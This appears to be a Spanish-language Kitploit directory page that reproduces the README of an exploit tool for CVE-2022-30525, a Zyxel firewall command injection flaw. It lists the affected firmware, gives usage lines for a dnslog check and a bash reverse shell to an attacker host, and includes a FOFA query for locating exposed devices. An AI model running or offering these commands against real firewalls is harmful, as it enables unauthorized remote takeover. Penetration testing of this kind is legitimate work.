Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-30525 — CVE-2022-30525 Vulnerabilidad de inyección de comandos en firewall Zyxel POC&EXPC | Kitploit
Herramientas/GitHubGitHub/west9b/cve-2022-30525
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Vulnerabilidad de inyección de comandos en firewall Zyxel POC&EXPC

Ver Repositorio
1233hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-30525 Vulnerabilidad de inyección de comandos en el firewall Zyxel

CVE-2022-30525 POC&EXP

autor:160team.west9B

Solo para uso de investigadores de seguridad debidamente autorizados. Cumpla con la Ley de Ciberseguridad. Cualquier problema que surja es responsabilidad del usuario, no del autor.

01-Introducción básica

El 12 de mayo de 2022, Zyxel publicó un aviso de seguridad para corregir una vulnerabilidad de inyección remota de comandos no autenticada (CVE-2022-30525) en sus dispositivos de firewall, con una puntuación CVSS de 9.8. La vulnerabilidad reside en el programa CGI de ciertas versiones de los firewalls Zyxel y permite ejecutar comandos arbitrarios en los dispositivos afectados sin autenticación.

Alcance afectado:

Firmware de la serie ATP: 5.10-5.21 Patch 1

Firmware de la serie VPN: 4.60-5.21 Patch 1

USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1

02-Instrucciones de uso

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

La ejecución de comandos de esta vulnerabilidad no tiene eco, por lo que el POC solicita la API de dnslog para verificar la vulnerabilidad; si dnslog recibe la solicitud, la vulnerabilidad existe. Para evitar falsos positivos debidos a la latencia de la red, la verificación de DNSLOG retrasa la solicitud 10 segundos.

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

El EXP realiza una reverse shell de bash. Después de -m exp, especifique la IP y el puerto del VPS.

**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

Capturas de pantalla

Image text Image text

Referencias

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

Descargar herramienta